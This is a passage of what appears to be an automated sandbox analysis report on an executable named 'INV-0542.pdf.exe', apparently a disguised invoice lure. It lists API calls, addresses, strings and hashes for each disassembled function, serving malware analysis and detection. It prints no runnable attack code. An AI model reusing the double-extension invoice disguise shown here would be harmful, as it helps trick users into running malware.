                                                                                                                                                                • Opcode Fuzzy Hash: a09e9907cf1d85342395cb53904611de706c132920ab67d22d4dedafd93240b8
                                                                                                                                                                • Instruction Fuzzy Hash: BA029C70A00608AFDB20DF64DD45AAF7BB5FB44314F10817AE610BA2E1D7B98A42DF18
                                                                                                                                                                APIs
                                                                                                                                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 0040471D
                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 00404731
                                                                                                                                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 0040474E
                                                                                                                                                                • GetSysColor.USER32(?), ref: 0040475F
                                                                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040476D
                                                                                                                                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040477B
                                                                                                                                                                • lstrlenW.KERNEL32(?), ref: 00404780
                                                                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040478D
                                                                                                                                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004047A2
                                                                                                                                                                • GetDlgItem.USER32(?,0000040A), ref: 004047FB
                                                                                                                                                                • SendMessageW.USER32(00000000), ref: 00404802
                                                                                                                                                                • GetDlgItem.USER32(?,000003E8), ref: 0040482D
                                                                                                                                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404870
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 0040487E
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 00404881
                                                                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040489A
                                                                                                                                                                • SetCursor.USER32(00000000), ref: 0040489D
                                                                                                                                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004048CC
                                                                                                                                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004048DE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                • String ID: : Completed$N
                                                                                                                                                                • API String ID: 3103080414-2140067464
                                                                                                                                                                • Opcode ID: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                                                                                                                • Instruction ID: 9930e5d90db5dccbb26e86255d6156f8bb9eb7c4e216bd2cc4efdce7ef6c99e8
                                                                                                                                                                • Opcode Fuzzy Hash: 4011bf91f23cdad070dcf702cd0082b1ea04741390be1e297b86103e4649bf75
                                                                                                                                                                • Instruction Fuzzy Hash: 8E6180B1A00209BFDB10AF64DD85A6A7B69FB84354F00843AF605B62D0D7B8AD51DF98
                                                                                                                                                                APIs
                                                                                                                                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                                                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                • DrawTextW.USER32(00000000,00428A20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                • String ID: F
                                                                                                                                                                • API String ID: 941294808-1304234792
                                                                                                                                                                • Opcode ID: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                                                                • Instruction ID: d1034cbb9d528375343357a353c0022e70e8214492c202610c441178c5bfc5cd
                                                                                                                                                                • Opcode Fuzzy Hash: fcc37e75e13d0dca8524aaa06a8ee829d240d30c68f9aadea354bd02ab1c226a
                                                                                                                                                                • Instruction Fuzzy Hash: FC417B71800249AFCB058FA5DE459AFBBB9FF45314F00802EF592AA1A0CB74DA55DFA4
                                                                                                                                                                APIs
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406322,?,?), ref: 004061C2
                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,004265A8,00000400), ref: 004061CB
                                                                                                                                                                  • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA6
                                                                                                                                                                  • Part of subcall function 00405F96: lstrlenA.KERNEL32(00000000,?,00000000,0040627B,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD8
                                                                                                                                                                • GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 004061E8
                                                                                                                                                                • wsprintfA.USER32 ref: 00406206
                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,00426DA8,C0000000,00000004,00426DA8,?,?,?,?,?), ref: 00406241
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406250
                                                                                                                                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406288
                                                                                                                                                                • SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004261A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062DE
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004062EF
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062F6
                                                                                                                                                                  • Part of subcall function 00406031: GetFileAttributesW.KERNELBASE(00000003,004030E2,00437800,80000000,00000003), ref: 00406035
                                                                                                                                                                  • Part of subcall function 00406031: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406057
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                • String ID: %ls=%ls$[Rename]
                                                                                                                                                                • API String ID: 2171350718-461813615
                                                                                                                                                                • Opcode ID: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                                • Instruction ID: 01145b8f81eafc368a5e669bb7cc9688017d9d0d23ed4dcd6a8783cd941829b9
                                                                                                                                                                • Opcode Fuzzy Hash: ad23c2c12608704314c1a1c2d98a70ea5e027cecb5ac03fef5858bd56b87dd73
                                                                                                                                                                • Instruction Fuzzy Hash: DF31353060072ABBD6207B659D49F2B3A5CDF41754F12007EF902F62D2EA3D9C2586BD
                                                                                                                                                                APIs
                                                                                                                                                                • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406852
                                                                                                                                                                • CharNextW.USER32(?,?,?,00000000,?,00000008,0000000A,0000000C,?,?,?,?,?,?,?,?), ref: 00406861
                                                                                                                                                                • CharNextW.USER32(?,"C:\Users\user\Desktop\INV-0542.pdf.exe",75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406866
                                                                                                                                                                • CharPrevW.USER32(?,?,75923420,C:\Users\user\AppData\Local\Temp\,00000000,004034F7,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403806,?,00000008,0000000A,0000000C), ref: 00406879
                                                                                                                                                                Strings
                                                                                                                                                                • "C:\Users\user\Desktop\INV-0542.pdf.exe", xrefs: 00406833
                                                                                                                                                                • *?|<>/":, xrefs: 00406841
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004067F0
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Char$Next$Prev
                                                                                                                                                                • String ID: "C:\Users\user\Desktop\INV-0542.pdf.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 589700163-4006617364
                                                                                                                                                                • Opcode ID: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                • Instruction ID: 55fd55a6259970f18c414665dfb8d2eb8684f68ced2253b2c35ece4a8e009edc
                                                                                                                                                                • Opcode Fuzzy Hash: d9890b2689dddc4776a4db6af1629ac80bd1bcc56ba6148264ccbff8cf15ab87
                                                                                                                                                                • Instruction Fuzzy Hash: 0E11E61780221295DB303B15CC40ABB62E8EF54750F16C43FE999732C0E77C4C9286BD
                                                                                                                                                                APIs
                                                                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404544
                                                                                                                                                                • GetSysColor.USER32(00000000), ref: 00404582
                                                                                                                                                                • SetTextColor.GDI32(?,00000000), ref: 0040458E
                                                                                                                                                                • SetBkMode.GDI32(?,?), ref: 0040459A
                                                                                                                                                                • GetSysColor.USER32(?), ref: 004045AD
                                                                                                                                                                • SetBkColor.GDI32(?,?), ref: 004045BD
                                                                                                                                                                • DeleteObject.GDI32(?), ref: 004045D7
                                                                                                                                                                • CreateBrushIndirect.GDI32(?), ref: 004045E1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2320649405-0
                                                                                                                                                                • Opcode ID: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                • Instruction ID: d41769c693a3b03867a7fa47e0dc02698e8003aaa16d7874add0ef0652afaaee
                                                                                                                                                                • Opcode Fuzzy Hash: 9dba601b91aff6ac4bf2e5f3eaee39d76022ea5146a5c84035e03d3d84c8d27c
                                                                                                                                                                • Instruction Fuzzy Hash: 5A2195B1500704BFCB349F39DD08A477BF8AF41714B00892EEA96A22E0DB38DA44CB54
                                                                                                                                                                APIs
                                                                                                                                                                • ReadFile.KERNEL32(?,?,?,?), ref: 0040277D
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004027B8
                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027DB
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027F1
                                                                                                                                                                  • Part of subcall function 00406112: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00406128
                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040289D
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                                                                • String ID: 9
                                                                                                                                                                • API String ID: 163830602-2366072709
                                                                                                                                                                • Opcode ID: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                                                                                                                • Instruction ID: 7b917313dc97d271e667d5624dbaf811d8953be2b726cd25112f37da0e7500b1
                                                                                                                                                                • Opcode Fuzzy Hash: 91519286727b7715e667a28de049f7dc24ed8e1d9bfc14afdf41a8c3697f6d43
                                                                                                                                                                • Instruction Fuzzy Hash: 35511E75D04119AADF20EFD4CA84AAEB779FF44304F14817BE501B62D0D7B89D828B58
                                                                                                                                                                APIs
                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E96
                                                                                                                                                                • GetMessagePos.USER32 ref: 00404E9E
                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 00404EB8
                                                                                                                                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404ECA
                                                                                                                                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404EF0
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Message$Send$ClientScreen
                                                                                                                                                                • String ID: f
                                                                                                                                                                • API String ID: 41195575-1993550816
                                                                                                                                                                • Opcode ID: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                • Instruction ID: 6d9709cdd774db07ceaeaaa3ef1e8ea5a4c7015a7cc254b2929396571b15d8ef
                                                                                                                                                                • Opcode Fuzzy Hash: 3b05e908374c5eb3ed0cc07743cf8bdf4b6f619b857b2f4ef42225a5e6fc1927
                                                                                                                                                                • Instruction Fuzzy Hash: 7E015E71900218BADB00DB94DD85BFEBBBCAF95B11F10412BBB51B61D0C7B49A418BA4
                                                                                                                                                                APIs
                                                                                                                                                                • GetDC.USER32(?), ref: 00401E76
                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E90
                                                                                                                                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E98
                                                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00401EA9
                                                                                                                                                                • CreateFontIndirectW.GDI32(0040CDC8), ref: 00401EF8
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                                                                • String ID: Tahoma
                                                                                                                                                                • API String ID: 3808545654-3580928618
                                                                                                                                                                • Opcode ID: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                                                                                                                • Instruction ID: 1d77b42acd886a27ae9f5cf53f8bcf428a8cf24ec4295262a5ba191a384267e2
                                                                                                                                                                • Opcode Fuzzy Hash: ef63408107684041e4866229634915ac86451c59f948bd83cb9cb27aef798f6a
                                                                                                                                                                • Instruction Fuzzy Hash: 9E01B171950250EFEB005BB4AE8AADD3FB0AF59300F10497AF142BA1E2CAB804049B2C
                                                                                                                                                                APIs
                                                                                                                                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FD6
                                                                                                                                                                • MulDiv.KERNEL32(000E0F4C,00000064,000E1878), ref: 00403001
                                                                                                                                                                • wsprintfW.USER32 ref: 00403011
                                                                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00403021
                                                                                                                                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403033
                                                                                                                                                                Strings
                                                                                                                                                                • verifying installer: %d%%, xrefs: 0040300B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000454000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2105141739.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_INV-0542.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                • String ID: verifying installer: %d%%
                                                                                                                                                                • API String ID: 1451636040-82062127
                                                                                                                                                                • Opcode ID: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                                                                • Instruction ID: 92b1fa929db6ad6423e495ae3c8b7d5051599f53ef0535b5d141126ce54988b0
                                                                                                                                                                • Opcode Fuzzy Hash: 7c72eb226873640f15370cd8631d515f33e7e0e766319f11269e715f4bf9c46b
                                                                                                                                                                • Instruction Fuzzy Hash: 41014F70640208BBEF209F60DD49FEE3B69BB04345F008039FA02A51D0DBB99A559F58
                                                                                                                                                                APIs
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029D6
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029F2
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 00402A2B
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 00402A3E
                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A5A
                                                                                                                                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A6D
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2104748874.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2104583772.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104785865.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2104824049.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
